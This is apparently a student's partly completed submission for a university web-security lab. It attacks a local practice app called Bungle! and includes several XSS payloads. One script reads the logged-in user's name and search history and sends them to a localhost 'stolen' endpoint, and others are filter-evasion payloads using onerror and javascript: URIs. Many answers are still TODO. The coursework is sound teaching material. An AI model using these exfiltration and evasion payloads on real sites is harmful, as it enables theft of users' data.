COSC 311 Assignment #3: Web Security

Due Date: 10/22/21 at 5:00pm ET

You may work with a partner on this assignment. 
Only one person partnership needs to submit.

Reminder: You may NOT work with the same partner on multiple assignments. 


NAMES: Mia McDuffie

________________________________________________________________________________________

Part 1: Cross-site Scripting (35%)

	1.0) Payload (JavaScript/jQuery):


		http://localhost:31337/stolen?user=USERNAME&last_search=LAST_SEARCH


		<script>
			window.onload = function(){ 
				var username = document.getElementById('logged-in-user').innerHTML;
				var last_search = document.getElementsByClassName("history-item")[1].innerHTML;
				var theUrl = "http://localhost:31337/stolen?user=" + username + "&last_search=" + last_search;
				var xmlHttp = new XMLHttpRequest();xmlHttp.open( "GET", theUrl, false );
			
			};
		</script>


	1.0) No defense

		http://0.0.0.0:8080/search?xssdefense=0&q=TODO

		http://0.0.0.0:8080/search?xssdefense=0&q=<script>window.onload = function(){ var username = document.getElementById('logged-in-user').innerHTML;var last_search = document.getElementsByClassName("history-item")[1].innerHTML;var theUrl = "http://localhost:31337/stolen?user=" + username + "&last_search=" + last_search;var xmlHttp = new XMLHttpRequest();xmlHttp.open( "GET", theUrl, false );};</script>

		

	1.1) Remove "script"

		window.onload = function(){ var username = document.getElementById('logged-in-user').innerHTML;var last_search = document.getElementsByClassName("history-item")[1].innerHTML;var theUrl = "http://localhost:31337/stolen?user=" + username + "&last_search=" + last_search;var xmlHttp = new XMLHttpRequest();xmlHttp.open( "GET", theUrl, false );};alert(theUrl);


		http://0.0.0.0:8080/search?xssdefense=1&q=TODO


		Another example:
		<p> <a href="" onload="alert('I excuted JavaScript!');">Click me to see the JavaScript work!</a> </p>




		var username = document.getElementById('logged-in-user').innerHTML;
		alert(last_search);

		<IMG SRC=/ onerror="
		window.onload = function(){ 
			var last_search = document.getElementsByClassName("history-item")[1].innerHTML;
			
		};
		"></img>
		https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html

	1.2) Remove several tags 

		http://0.0.0.0:8080/search?xssdefense=2&q=TODO

		http://0.0.0.0:8080/search?q=%3Ciframe+src%3D%22https%3A%2F%2Fbongo.cat%2F%22%3E
		<iframe src="https://bongo.cat/">

		http://0.0.0.0:8080/search?q=%3Ctable+background%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E
		<table background="javascript:alert('XSS')">


	1.3) Remove " ' and ;

		http://0.0.0.0:8080/search?xssdefense=3&q=TODO

		http://0.0.0.0:8080/search?q=%3Ciframe+SRC%3DJaVaScRiPt%3Aalert%28%29%3E
		<iframe SRC=JaVaScRiPt:alert()>

		http://0.0.0.0:8080/search?q=%3CA+HREF%3Dhttp%3A%2F%2Fgoogle.com%2F%3Elink%3C%2FA%3E
		<A HREF=http://google.com/>link</A>
		


	1.4) [Optional extra credit] Encode < and >

		http://0.0.0.0:8080/search?xssdefense=4&q=TODO


________________________________________________________________________________________

Part 2: Cross-site Request Forgery (20%)

	2.0) No defense. Target URL: http://0.0.0.0:8080/login?csrfdefense=0&xssdefense=4

		<html>
			TODO
		</html>


	2.1) Token validation (with XSS). Target URL: http://0.0.0.0:8080/login?csrfdefense=1&xssdefense=0

		<html>
			TODO
		</html>


	2.2) [Optional extra credit] Token validation (without XSS). Target URL: http://0.0.0.0:8080/login?csrfdefense=&xssdefense=4

		<html>
			TODO
		</html>


________________________________________________________________________________________


Part 3: SQL Injection (10%)

	Username: TODO
	Password: TODO


________________________________________________________________________________________


Part 4: Better Defenses (35%)

	4.0) bungle_secure.zip (uploaded to Gradescope separately) 	


	4.1) Briefly describe how you implemented password salting and hashing 

		TODO
		

	4.2) Briefly describe the changes you made to database.py to prevent SQL injection attacks

		TODO


	4.3) In 1-2 paragraphs, provide some advice to the Bunglers about how they should 
	     strengthen Bungle!'s defenses to prevent XSS attacks

		TODO


	4.4) In 1-2 paragraphs, provide some advice to the Bunglers about how they should 
	     strengthen Bungle!'s defenses to prevent CSRF attacks

	     	TODO


________________________________________________________________________________________


Additional Questions

	Q1 (ungraded). How did you divide the work between partners? (Put N/A if worked alone)

		[Your answer here]


	Q2 (optional, ungraded). Did you use code snippets from anywhere online that you need to cite?

		https://www.w3schools.com/tags/ref_urlencode.ASP
		https://www.veracode.com/security/xss
		https://www.codegrepper.com/code-examples/javascript/xss+attack+without+script+tag
		https://www.acunetix.com/websitesecurity/cross-site-scripting/


	Q3 (optional, ungraded). Do you have any suggestions for improving this assignment in the future?

		[Your answer here]